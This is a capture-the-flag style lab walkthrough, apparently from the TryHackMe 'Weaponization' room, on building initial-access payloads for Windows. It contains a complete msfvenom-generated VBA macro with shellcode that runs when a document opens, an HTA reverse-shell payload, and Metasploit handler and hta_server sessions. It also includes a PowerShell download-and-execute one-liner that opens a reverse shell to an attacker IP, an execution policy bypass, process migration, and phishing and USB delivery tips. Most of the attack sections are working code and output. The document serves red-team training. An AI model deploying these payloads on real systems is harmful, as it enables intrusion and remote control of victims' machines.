## Introduction

![602e161a31bb6a9299dc7e574504a9c7.png](../img/602e161a31bb6a9299dc7e574504a9c7.png)

### What is Weaponization

Weaponization is the second stage of the Cyber Kill Chain model. In this stage, the attacker generates and develops their own malicious code using deliverable payloads such as word documents, PDFs, etc. The weaponization stage aims to use the malicious weapon to exploit the target machine and gain initial access.

Most organizations have Windows OS running, which is going to be a likely target. An organization’s environment policy often blocks downloading and executing `.exe` files to avoid security violations. Therefore, red teamers rely upon building custom payloads sent via various channels such as phishing campaigns, social engineering, browser or software exploitation, USB, or web methods.

The following graph is an example of weaponization, where a crafted custom PDF or Microsoft Office document is used to deliver a malicious payload. The custom payload is configured to connect back to the command and control environment of the red team infrastructure.

![8bc31aa31027c48e49d31e332bd248c6.png](../img/8bc31aa31027c48e49d31e332bd248c6.png)

For more information about red team toolkits: https://github.com/infosecn1nja/Red-Teaming-Toolkit#Payload Development

Most organizations block or monitor the execution of `.exe` files within their controlled environment. For that reason, red teamers rely on executing payloads using other techniques, such as built-in windows scripting technologies.

## Windows Scripting Host - WSH

Windows scripting host is a built-in Windows administration tool that runs batch files to automate and manage tasks within the operating system.

It is a Windows native engine, `cscript.exe` (for command-line scripts) and `wscript.exe` (for UI scripts), which are responsible for executing various Microsoft Visual Basic Scripts (VBScript), including `vbs` and `vbe`. For more information about VBScript, please visit [here](https://en.wikipedia.org/wiki/VBScript). It is important to note that the VBScript engine on a Windows operating system runs and executes applications with the same level of access and permission as a regular user; therefore, it is useful for the red teamers.

Now let's write a simple VBScript code to create a windows message box that shows the `Welcome to THM` message. Make sure to save the following code into a file, for example, `hello.vbs`.

```vbs
Dim message 
message = "Welcome to THM"
MsgBox message
```

In the first line, we declared the `message` variable using `Dim`. Then we store a string value of `Welcome to THM` in the `message` variable. In the next line, we use the MsgBox function to show the content of the variable. For more information about the MsgBox function, please visit [here](https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/scripting-articles/sfw6660x%28v=vs.84%29?redirectedfrom=MSDN). Then, we use `wscript` to run and execute the content of `hello.vbs`. As a result, A Windows message will pop up with the `Welcome to THM` message.

![7f3b95cb15f9f695f4a9b238fac4931b.png](../img/7f3b95cb15f9f695f4a9b238fac4931b.png)

Now let's use the VBScript to run executable files. The following `vbs` code is to invoke the Windows calculator, proof that we can execute `.exe` files using the Windows native engine (WSH).

```vbs
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
```

We create an object of the `WScript` library using `CreateObject` to call the execution payload. Then, we utilize the `Run` method to execute the payload. For this task, we will run the Windows calculator `calc.exe`.

To execute the `exe` file, we can run it using the `wscript` as follows:

```powershell
c:\Windows\System32>wscript c:\Users\thm\Desktop\payload.vbs
```

We can also run it via `cscript` as follows:

```powershell
c:\Windows\System32>cscript.exe c:\Users\thm\Desktop\payload.vbs
```

As a result, the Windows calculator will appear on the Desktop.

![bc82a7af0e877a9e7186ff40746eb7a5.png](../img/bc82a7af0e877a9e7186ff40746eb7a5.png)

Another trick. If the VBS files are blacklisted, then we can rename the file to `.txt` file and run it using `wscript` as follows:

```powershell
c:\Windows\System32>wscript /e:VBScript c:\Users\thm\Desktop\payload.txt
```

The result will be as exact as executing the `vbs` files, which run the `calc.exe` binary.

![9bf363d95f2f5a47a677fdbdfdc9e1e6.png](../img/9bf363d95f2f5a47a677fdbdfdc9e1e6.png)

## An HTML Application - HTA

HTA stands for “HTML Application.” It allows you to create a downloadable file that takes all the information regarding how it is displayed and rendered. HTML Applications, also known as HTAs, which are dynamic `HTML` pages containing JScript and VBScript. The LOLBINS (Living-of-the-land Binaries) tool `mshta` is used to execute HTA files. It can be executed by itself or automatically from Internet Explorer.

In the following example, we will use an `ActiveXObject` in our payload as proof of concept to execute `cmd.exe`. Consider the following HTML code.

```html
<html>
<body>
<script>
    var c= 'cmd.exe'
    new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>
```

Then serve the `payload.hta` from a web server, this could be done from the attacking machine as follows:

```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/weaponization]
└─$ python3 -m http.server 8000        
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

On the victim machine, visit the malicious link using Microsoft Edge, `http://10.8.232.37:8090/payload.hta`.

![cf6fa81498244bf2e15e5384c8813ea7.png](../img/cf6fa81498244bf2e15e5384c8813ea7.png)

Once we press `Run`, the `payload.hta` gets executed, and then it will invoke the `cmd.exe`. The following figure shows that we have successfully executed the `cmd.exe`.

![a231c438f265ea5fbf7fb97ff769f6b1.png](../img/a231c438f265ea5fbf7fb97ff769f6b1.png)

### HTA Reverse Connection

We can create a reverse shell payload as follows:

```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/weaponization]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.14.45.90 LPORT=8000 -f hta-psh -o thm.hta
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of hta-psh file: 7777 bytes
Saved as: thm.hta
```

We use the `msfvenom` from the `Metasploit` framework to generate a malicious payload to connect back to the attacking machine. We used the following payload to connect the `windows/x64/shell_reverse_tcp` to our IP and listening port.

On the attacking machine, we need to listen to the port `8000` using `nc`.

Once the victim visits the malicious URL and hits run, we get the connection back.

```bash
┌──(parallels㉿kali-linux-2022-2)-[~]
└─$ rlwrap nc -lvnp 8000
listening on [any] 8000 ...
connect to [10.14.45.90] from (UNKNOWN) [10.10.99.124] 50216
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\thm\Downloads>
```

### Malicious HTA via Metasploit

There is another way to generate and serve malicious HTA files using the Metasploit framework. First, run the Metasploit framework using `msfconsole -q` command. Under the exploit section, there is `exploit/windows/misc/hta_server`, which requires selecting and setting information such as `LHOST`, `LPORT`, `SRVHOST`, `Payload`, and finally, executing `exploit` to run the module.

```bash
msf6 > use exploit/windows/misc/hta_server
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/hta_server) > set LHOST 10.14.45.90
LHOST => 10.14.45.90
msf6 exploit(windows/misc/hta_server) > set LPORT 8000
LPORT => 8000
msf6 exploit(windows/misc/hta_server) > set SRVHOST 10.14.45.90
SRVHOST => 10.14.45.90
msf6 exploit(windows/misc/hta_server) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/hta_server) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/misc/hta_server) > 
[*] Started reverse TCP handler on 10.14.45.90:8000 
[*] Using URL: http://10.14.45.90:8080/mC9V7xmsc8Wxiz.hta
[*] Server started.
```

On the victim machine, once we visit the malicious HTA file that was provided as a URL by Metasploit, we should receive a reverse connection.

```bash
[*] 10.10.99.124     hta_server - Delivering Payload
[*] Sending stage (175686 bytes) to 10.10.99.124
[*] Meterpreter session 1 opened (10.14.45.90:8000 -> 10.10.99.124:50288) at 2023-03-20 09:47:33 +0100
```

## Visual Basic for Application - VBA

VBA stands for Visual Basic for Applications, a programming language by Microsoft implemented for Microsoft applications such as Microsoft Word, Excel, PowerPoint, etc. VBA programming allows automating tasks of nearly every keyboard and mouse interaction between a user and Microsoft Office applications.

Macros are Microsoft Office applications that contain embedded code written in a programming language known as Visual Basic for Applications (VBA). It is used to create custom functions to speed up manual tasks by creating automated processes. One of VBA's features is accessing the Windows Application Programming Interface ([API](https://en.wikipedia.org/wiki/Windows_API)) and other low-level functionality. For more information about VBA, visit [here](https://en.wikipedia.org/wiki/Visual_Basic_for_Applications).

In this task, we will discuss the basics of VBA and the ways the adversary uses macros to create malicious Microsoft documents. To follow up along with the content of this task, make sure to deploy the attached Windows machine in Task 2. When it is ready, it will be available through in-browser access.

Now open Microsoft Word 2016 from the Start menu. Once it is opened, we close the product key window since we will use it within the seven-day trial period.
![b990331be05e8daf06bdd9942d45f0ef.png](../img/b990331be05e8daf06bdd9942d45f0ef.png)

Next, make sure to accept the Microsoft Office license agreement that shows after closing the product key window.
![e2453e9501b25c05540b24eb0823194d.png](../img/e2453e9501b25c05540b24eb0823194d.png)

Now create a new blank Microsoft document to create our first `macro`. The goal is to discuss the basics of the language and show how to run it when a Microsoft Word document gets opened. First, we need to open the Visual Basic Editor by selecting `view` → `macros`. The Macros window shows to create our own macro within the document.
![07a1e96a19759aed5e96e64f315f0e1d.png](../img/07a1e96a19759aed5e96e64f315f0e1d.png)

In the `Macro name` section, we choose to name our macro as `THM`. Note that we need to select from the `Macros in` list `Document1` and finally select `create`. Next, the Microsoft Visual Basic for Application editor shows where we can write VBA code. Let's try to show a message box with the following message: `Welcome to Weaponization Room!`. We can do that using the `MsgBox` function as follows:

```vba
Sub THM()
  MsgBox ("Welcome to Weaponization Room!")
End Sub
```

Finally, run the macro by `F5` or `Run` → `Run Sub/UserForm`.

Now in order to execute the VBA code automatically once the document gets opened, we can use built-in functions such as `AutoOpen` and `Document_open`. Note that we need to specify the function name that needs to be run once the document opens, which in our case, is the `THM` function.

```vba
Sub Document_Open()
  THM
End Sub

Sub AutoOpen()
  THM
End Sub

Sub THM()
   MsgBox ("Welcome to Weaponization Room!")
End Sub
```

It is important to note that to make the macro work, we need to save it in Macro-Enabled format such as `.doc and docm`. Now let's save the file as `Word 97-2003 Template` where the Macro is enabled by going to `File → save Document1` and save as type → `Word 97-2003 Document` and finally, `save`.
![dd2a98ae33beb496773a80d2efc522f4.png](../img/dd2a98ae33beb496773a80d2efc522f4.png)

Let's close the Word document that we saved. If we reopen the document file, Microsoft Word will show a security message indicating that `Macros have been disabled` and give us the option to enable it. Let's enable it and move forward to check out the result.
![7c2d1079d59641a21207dfdd3029def4.png](../img/7c2d1079d59641a21207dfdd3029def4.png)

Once we allowed the `Enable Content`, our macro gets executed as shown:
![0bc89301bfb587d502df046ceed9507a.png](../img/0bc89301bfb587d502df046ceed9507a.png)

Now edit the word document and create a macro function that executes a `calc.exe` or any executable file as proof of concept as follows:

```vba
Sub PoC()
    Dim payload As String
    payload = "calc.exe"
    CreateObject("Wscript.Shell").Run payload,0
End Sub
```

To explain the code in detail, with `Dim payload As String`, we declare `payload` variable as a string using `Dim` keyword. With `payload = "calc.exe"` we are specifying the payload name and finally with `CreateObject("Wscript.Shell").Run payload` we create a Windows Scripting Host (WSH) object and run the payload. Note that if you want to rename the function name, then you must include the function name in the `AutoOpen()` and `Document_open()` functions too.

Make sure to test your code before saving the document by using the running feature in the editor. Make sure to create `AutoOpen()` and `Document_open()` functions before saving the document. Once the code works, now save the file and try to open it again.
![5a392a235f57eb3a6f56cf487ad99024.png](../img/5a392a235f57eb3a6f56cf487ad99024.png)

Now let's create an in-memory meterpreter payload using the Metasploit framework to receive a reverse shell. First, from the AttackBox, we create our meterpreter payload using `msfvenom`. We need to specify the `Payload`, `LHOST`, and `LPORT`, which match what is in the Metasploit framework. Note that we specify the payload as `VBA` to use it as a macro.

```bash
┌──(parallels㉿kali-linux-2022-2)-[~]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.14.45.90 LPORT=8080 -f vba
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of vba file: 2736 bytes
#If Vba7 Then
        Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Jfdglz As Long, ByVal Wbploemu As Long, ByVal Xfericnf As LongPtr, Hmzfxsuc As Long, ByVal Ynnyt As Long, Gao As Long) As LongPtr
        Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Jyfe As Long, ByVal Tvcvyzcc As Long, ByVal Sehmtpe As Long, ByVal Bouqpnqeu As Long) As LongPtr
        Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Emljere As LongPtr, ByRef Aqwsk As Any, ByVal Pflpz As Long) As LongPtr
#Else
        Private Declare Function CreateThread Lib "kernel32" (ByVal Jfdglz As Long, ByVal Wbploemu As Long, ByVal Xfericnf As Long, Hmzfxsuc As Long, ByVal Ynnyt As Long, Gao As Long) As Long
        Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Jyfe As Long, ByVal Tvcvyzcc As Long, ByVal Sehmtpe As Long, ByVal Bouqpnqeu As Long) As Long
        Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Emljere As Long, ByRef Aqwsk As Any, ByVal Pflpz As Long) As Long
#EndIf

Sub Auto_Open()
        Dim Wkkllc As Long, Fywrajyig As Variant, Aysafx As Long
#If Vba7 Then
        Dim  Pbbd As LongPtr, Cnjd As LongPtr
#Else
        Dim  Pbbd As Long, Cnjd As Long
#EndIf
        Fywrajyig = Array(252,232,143,0,0,0,96,49,210,100,139,82,48,139,82,12,137,229,139,82,20,15,183,74,38,139,114,40,49,255,49,192,172,60,97,124,2,44,32,193,207,13,1,199,73,117,239,82,139,82,16,87,139,66,60,1,208,139,64,120,133,192,116,76,1,208,139,72,24,80,139,88,32,1,211,133,201,116,60,73,49, _
255,139,52,139,1,214,49,192,193,207,13,172,1,199,56,224,117,244,3,125,248,59,125,36,117,224,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18,233,128,255,255,255,93,104,51,50,0,0,104,119,115,50,95,84, _
104,76,119,38,7,137,232,255,208,184,144,1,0,0,41,196,84,80,104,41,128,107,0,255,213,106,10,104,10,14,45,90,104,2,0,31,144,137,230,80,80,80,80,64,80,64,80,104,234,15,223,224,255,213,151,106,16,86,87,104,153,165,116,97,255,213,133,192,116,10,255,78,8,117,236,232,103,0,0,0, _
106,0,106,4,86,87,104,2,217,200,95,255,213,131,248,0,126,54,139,54,106,64,104,0,16,0,0,86,106,0,104,88,164,83,229,255,213,147,83,106,0,86,83,87,104,2,217,200,95,255,213,131,248,0,125,40,88,104,0,64,0,0,106,0,80,104,11,47,15,48,255,213,87,104,117,110,77,97,255,213, _
94,94,255,12,36,15,133,112,255,255,255,233,155,255,255,255,1,195,41,198,117,193,195,187,240,181,162,86,106,0,83,255,213)

        Pbbd = VirtualAlloc(0, UBound(Fywrajyig), &H1000, &H40)
        For Aysafx = LBound(Fywrajyig) To UBound(Fywrajyig)
                Wkkllc = Fywrajyig(Aysafx)
                Cnjd = RtlMoveMemory(Pbbd + Aysafx, Wkkllc, 1)
        Next Aysafx
        Cnjd = CreateThread(0, 0, Pbbd, 0, 0, 0)
End Sub
Sub AutoOpen()
        Auto_Open
End Sub
Sub Workbook_Open()
        Auto_Open
End Sub
```

**Import to note** that one modification needs to be done to make this work. The output will be working on an MS excel sheet. Therefore, change the `Workbook_Open()` to `Document_Open()` to make it suitable for MS word documents.

Now copy the output and save it into the macro editor of the MS word document, as we showed previously.

From the attacking machine, run the Metasploit framework and set the listener as follows:

```bash
──(parallels㉿kali-linux-2022-2)-[~]
└─$ msfconsole -q
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.14.45.90
LHOST => 10.14.45.90
msf6 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.14.45.90:8080
```

Once the malicious MS word document is opened on the victim machine, we should receive a reverse shell.

```bash
[*] Sending stage (175686 bytes) to 10.10.116.243
[*] Meterpreter session 1 opened (10.14.45.90:8080 -> 10.10.116.243:49870) at 2023-03-20 11:18:54 +0100

meterpreter > 
```

## PowerShell (PSH)

PowerShell is an object-oriented programming language executed from the Dynamic Language Runtime (DLR) in `.NET` with some exceptions for legacy uses.

Red teamers rely on PowerShell in performing various activities, including initial access, system enumerations, and many others. Let's start by creating a straightforward PowerShell script that prints "Welcome to the Weaponization Room!" as follows:

```powershell
Write-Output "Welcome to the Weaponization Room!"
```

Save the file as `thm.ps1`. With the `Write-Output`, we print the message "Welcome to the Weaponization Room!" to the command prompt. Now let's run it and see the result.

```powershell
C:\Users\thm\Desktop>powershell -File thm.ps1
File C:\Users\thm\Desktop\thm.ps1 cannot be loaded because running scripts is disabled on this system. For more
information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
    + CategoryInfo          : SecurityError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : UnauthorizedAccess
```

### Execution Policy

PowerShell's execution policy is a **security option** to protect the system from running malicious scripts. By default, Microsoft disables executing PowerShell scripts `.ps1` for security purposes. The PowerShell execution policy is set to `Restricted`, which means it permits individual commands but not run any scripts.

You can determine the current PowerShell setting of your Windows as follows:

```powershell
PS C:\Users\thm> Get-ExecutionPolicy
Restricted
```

We can also easily change the PowerShell execution policy by running:

```powershell
PS C:\Users\thm\Desktop> Set-ExecutionPolicy -Scope CurrentUser RemoteSigned

Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic at
http://go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "N"): A
```

### Bypass Execution Policy

Microsoft provides ways to disable this restriction. One of these ways is by giving an argument option to the PowerShell command to change it to your desired setting. For example, we can change it to `bypass` policy which means nothing is blocked or restricted. This is useful since that lets us run our own PowerShell scripts.

In order to make sure our PowerShell file gets executed, we need to provide the bypass option in the arguments as follows:

```powershell
C:\Users\thm\Desktop>powershell -ex bypass -File thm.ps1
Welcome to Weaponization Room!
```

Now, let's try to get a reverse shell using one of the tools written in PowerShell, which is `powercat`. On your AttackBox, download it from GitHub and run a webserver to deliver the payload.

```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/weaponization]
└─$ git clone https://github.com/besimorhino/powercat.git
Cloning into 'powercat'...
remote: Enumerating objects: 239, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 239 (delta 0), reused 2 (delta 0), pack-reused 235
Receiving objects: 100% (239/239), 61.75 KiB | 972.00 KiB/s, done.
Resolving deltas: 100% (72/72), done.
```

Now, we need to set up a web server on that AttackBox to serve the `powercat.ps1` that will be downloaded and executed on the target machine. Next, change the directory to powercat and start listening on a port of your choice. In our case, we will be using port `8080`.

```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/weaponization]
└─$ cd powercat     
                                                                     
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/weaponization/powercat]
└─$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
```

On the AttackBox, we need to listen on port `1337` using `nc` to receive the connection back from the victim.

```bash
┌──(parallels㉿kali-linux-2022-2)-[~]
└─$ nc -lvnp 1337 
listening on [any] 1337 ...
```

Now, from the victim machine, we download the payload and execute it using PowerShell payload as follows:

```powershell
PS C:\Users\thm> powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.14.45.90:8080/powercat.ps
1');powercat -c 10.14.45.90 -p 1337 -e cmd"
```

Now that we have executed the command above, the victim machine downloads the `powercat.ps1` payload from our web server (on the AttackBox) and then executes it locally on the target using `cmd.exe` and sends a connection back to the AttackBox that is listening on port `1337`. After a couple of seconds, we should receive the connection call back:

```bash
┌──(parallels㉿kali-linux-2022-2)-[~]
└─$ nc -lvnp 1337 
listening on [any] 1337 ...
10.1014connect to [10.14.45.90] from (UNKNOWN) [10.10.116.243] 50024
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\thm>
```

## Command And Control - (C2 Or C&C)

![4f623e049bf350dd962364515962c9a8.png](../img/4f623e049bf350dd962364515962c9a8.png)

### What is Command and Control (C2)?

C2 frameworks are post-exploitation frameworks that allow red teamers to collaborate and control compromised machines. C2 is considered one of the most important tools for red teamers during offensive cyber operations. C2 frameworks provide fast and straightforward approaches to:

- Generate various malicious payloads
- Enumerate the compromised machine/networks
- Perform privilege escalation and pivoting
- Lateral movement
- And many others

Some popular C2 frameworks that we'll briefly highlight are Cobalt Strike, PowerShell Empire, Metasploit. Most of these frameworks aim to support a convenient environment to share and communicate between red team operations once the initial access is gained to a system.

### Cobalt Strike

Cobalt Strike is a commercial framework that focuses on Adversary Simulations and Red Team Operations. It is a combination of remote access tools, post-exploitation capabilities, and a unique reporting system. It provides an agent with advanced techniques to establish covert communications and perform various operations, including key-logging, files upload and download, VPN deployment, privilege escalation techniques, mimikatz, port scanning, and the most advanced lateral movements.

### PowerShell Empire

PowerShell Empire is an open-source framework that helps red team operators and pen testers collaborate across multiple servers using keys and shared passwords. It is an exploitation framework based on PowerShell and Python agents. PowerShell Empire focuses on client-side and post-exploitation of Windows and Active Directory environment.

### Metasploit

Metasploit is a widely used exploitation framework that offers various techniques and tools to perform hacking easily. It is an open-source framework and is considered one of the primary tools for pentesting and red team operations.

## Delivery Techniques

Delivery techniques are one of the important factors for getting initial access. They have to look professional, legitimate, and convincing to the victim in order to follow through with the content.
![c872865bafc1406c97915c341eca091a.png](../img/c872865bafc1406c97915c341eca091a.png)

### Email Delivery

It is a common method to use in order to send the payload by sending a phishing email with a link or attachment. For more info, visit [here](https://attack.mitre.org/techniques/T1566/001/). This method attaches a malicious file that could be the type we mentioned earlier. The goal is to convince the victim to visit a malicious website or download and run the malicious file to gain initial access to the victim's network or host.

The red teamers should have their own infrastructure for phishing purposes. Depending on the red team engagement requirement, it requires setting up various options within the email server, including DomainKeys Identified Mail (DKIM), Sender Policy Framework (SPF), and DNS Pointer (PTR) record.

The red teamers could also use third-party email services such as Google Gmail, Outlook, Yahoo, and others with good reputations.

Another interesting method would be to use a compromised email account within a company to send phishing emails within the company or to others. The compromised email could be hacked by phishing or by other techniques such as password spraying attacks.

![a43bce8581ac5d30fef12848afbc03b3.png](../img/a43bce8581ac5d30fef12848afbc03b3.png)

### Web Delivery

Another method is hosting malicious payloads on a web server controlled by the red teamers. The web server has to follow the security guidelines such as a clean record and reputation of its domain name and TLS (Transport Layer Security) certificate. For more information, visit [here](https://attack.mitre.org/techniques/T1189/).

This method includes other techniques such as social engineering the victim to visit or download the malicious file. A URL shortener could be helpful when using this method.

In this method, other techniques can be combined and used. The attacker can take advantage of zero-day exploits such as exploiting vulnerable software like Java or browsers to use them in phishing emails or web delivery techniques to gain access to the victim machine.

### USB Delivery
This method requires the victim to plug in the malicious USB physically. This method could be effective and useful at conferences or events where the adversary can distribute the USB. For more information about USB delivery, visit [here](https://attack.mitre.org/techniques/T1091/).

Often, organizations establish strong policies such as disabling USB usage within their organization environment for security purposes. While other organizations allow it in the target environment.

Common USB attacks used to weaponize USB devices include [Rubber Ducky](https://shop.hak5.org/products/usb-rubber-ducky-deluxe) and [USBHarpoon](https://www.minitool.com/news/usbharpoon.html), charging USB cable, such as [O.MG Cable](https://shop.hak5.org/products/omg-cable).

## Practice
In the Metasploit framework, we can inject our current process into another process on the victim machine using `migrate`. In our case, we need to migrate our current process, which is the MS word document, into another process to make the connection stable even if the MS word document is closed. The easiest way to do this is by using `migrate` post-module as follow:
```bash
┌──(parallels㉿kali-linux-2022-2)-[~]
└─$ msfconsole -q
msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 
LHOST => 
msf6 exploit(multi/handler) > set LHOST 10.14.45.90
LHOST => 10.14.45.90
msf6 exploit(multi/handler) > set LPORT 8000
LPORT => 8000
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.14.45.90:8000 
[*] Sending stage (175686 bytes) to 10.10.106.46
[*] Meterpreter session 1 opened (10.14.45.90:8000 -> 10.10.106.46:49703) at 2023-03-20 11:59:29 +0100

meterpreter > run post/windows/manage/migrate 

[*] Running module against DESKTOP-1AU6NT4
[*] Current server process: powershell.exe (2756)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 3524
[+] Successfully migrated into process 3524
```